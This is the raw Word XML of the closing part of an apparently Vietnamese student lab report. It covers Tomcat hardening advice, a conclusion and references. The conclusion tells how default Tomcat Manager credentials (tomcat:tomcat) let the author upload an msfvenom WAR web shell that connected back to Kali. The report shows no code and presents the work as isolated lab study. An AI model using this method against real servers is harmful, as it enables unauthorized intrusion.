        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Áp dụng nguyên tắc đặc quyền tối thiểu: tài khoản chạy Tomcat không nên có quyền root/system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05966552" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>Thực hiện kiểm thử xâm nhập định kỳ để phát hiện sớm các lỗi cấu hình và mật khẩu yếu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B9B980" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Bài học quan trọng: nhiều cuộc tấn công thành công không đến từ lỗ hổng zero-day phức tạp mà từ lỗi cấu hình cơ bản (mật khẩu mặc định, dịch vụ quản trị mở công khai). Việc “tấn công để phòng thủ” – tự kiểm thử hệ thống của mình – là cách hiệu quả để giảm thiểu rủi ro.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710E64F9" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>7. KẾT LUẬN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50449FDD" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Thực nghiệm đã thành công trong việc chiếm quyền điều khiển máy Metasploitable 2 thông qua lỗ hổng cấu hình của Apache Tomcat Manager. Sau khi dò được cặp tài khoản tomcat:tomcat, Web Shell được tải lên thủ công dưới dạng file WAR và kết nối ngược về máy Kali Linux, cho phép thực thi lệnh trên máy victim.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B5C16A" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Mặc dù module khai thác tự động của Metasploit không hoạt động ổn định trong môi trường thực nghiệm, phương pháp thủ công (tạo payload bằng msfvenom + tải lên qua giao diện Manager + lắng nghe bằng multi/handler) vẫn đạt được mục tiêu. Kết quả khẳng định mức độ nguy hiểm của việc sử dụng mật khẩu mặc định trên các dịch vụ quản trị.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECA0170" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Báo cáo mang tính chất học thuật và thực nghiệm trong môi trường lab cách ly. Mọi hành vi tấn công hệ thống thật mà không được phép đều là hành vi bất hợp pháp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A5D7F7" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>TÀI LIỆU THAM KHẢO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635AF3FF" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>AnonyViet.com – Tài liệu kỹ thuật và bảo mật mạng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334F729A" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Whitehat.vn – Cộng đồng an ninh mạng Việt Nam.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09EC462E" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Metasploit Framework Documentation – Rapid7.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484D0A15" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Apache Tomcat Documentation – tomcat.apache.org.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E88AA62" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap Network Scanning Documentation – nmap.org.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BFD5AE0" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00AC56B5">
      <w:pPr>
        <w:spacing w:before="400"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="769B86A6" w14:textId="67B35926" w:rsidR="00AC56B5" w:rsidRDefault="00AC56B5">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00AC56B5">
      <w:headerReference w:type="default" r:id="rId7"/>
      <w:footerReference w:type="default" r:id="rId8"/>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EC103" w14:textId="77777777" w:rsidR="00777C30" w:rsidRDefault="00777C30">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="28A3DF83" w14:textId="77777777" w:rsidR="00777C30" w:rsidRDefault="00777C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06621" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">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76003E">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76003E">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A2EB6" w14:textId="77777777" w:rsidR="00777C30" w:rsidRDefault="00777C30">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4E8445C1" w14:textId="77777777" w:rsidR="00777C30" w:rsidRDefault="00777C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3086C" w14:textId="77777777" w:rsidR="00AC56B5" w:rsidRDefault="00D66574">
    <w:pPr>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="6" w:space="4" w:color="999999"/>
      </w:pBdr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:i/>
        <w:iCs/>
        <w:color w:val="666666"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:t>Trường Đại học Công nghệ Giao thông Vận tải – Khoa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769BE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BEF8E992"/>
    <w:lvl w:ilvl="0" w:tplc="0E44B0D2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="1D5841EE">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="C6702B7A">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="434400F0">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="5422F9AA">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="BAFCFF7E">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="185AA09C">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="EFCACEF0">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="52A4CE36">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="2A8B52FE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="63D44B7C"/>
    <w:lvl w:ilvl="0" w:tplc="356CF16E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="9FC25234">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="04EAF968">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="CB82EF7E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="69F2FD42">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="6728D3CC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="C0E8F814">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="C96814F8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="BD66749E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="4FAD7657"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="56D480B8"/>
    <w:lvl w:ilvl="0" w:tplc="7FF8C68C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="5B6463C8">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="6A220046">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="B39C0106">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="8C16CD70">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="EBCECD1E">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="80907BDC">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="37B44726">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="06925106">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5D3D393B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B2BC610A"/>
    <w:lvl w:ilvl="0" w:tplc="2292C5CA">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="[%1]"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="5E209098">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="98522290">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="607E330C">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="9CD8B2BC">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="7D92C126">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="3F005664">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="B23E736E">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="CACC8818">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="71325F88"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7F22A71C"/>
    <w:lvl w:ilvl="0" w:tplc="7C6CA9D8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="40345612">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="6CD4A452">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="658ACA0E">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="018CD8D0">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="2D600C56">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="9DA66820">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="120006E0">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="3F5C01EC">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="7A18495D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="58CE334C"/>
    <w:lvl w:ilvl="0" w:tplc="4A9CAB46">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="094C2574">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="1FD20BA8">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="6D4C5480">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="07B4E92A">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="7CB48454">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="FC04E758">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="B8B2F7F6">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="5F0CA35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6B5"/>
    <w:rsid w:val="002774C3"/>
    <w:rsid w:val="002B73F9"/>
    <w:rsid w:val="006B7508"/>
    <w:rsid w:val="0076003E"/>
    <w:rsid w:val="00777C30"/>
    <w:rsid w:val="00975C69"/>
    <w:rsid w:val="00AC56B5"/>
    <w:rsid w:val="00D66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56B2A"/>
  <w15:docId w15:val="{4636D2AD-EA47-4444-BDC3-03D823842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rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="24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1388</Words>
  <Characters>7912</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>65</Lines>
  <Paragraphs>18</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>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trung nguyen</cp:lastModifiedBy>
  <cp:revision>6</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-10-12T10:59:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-10-12T11:15:00Z</dcterms:modified>
</cp:coreProperties>
</file>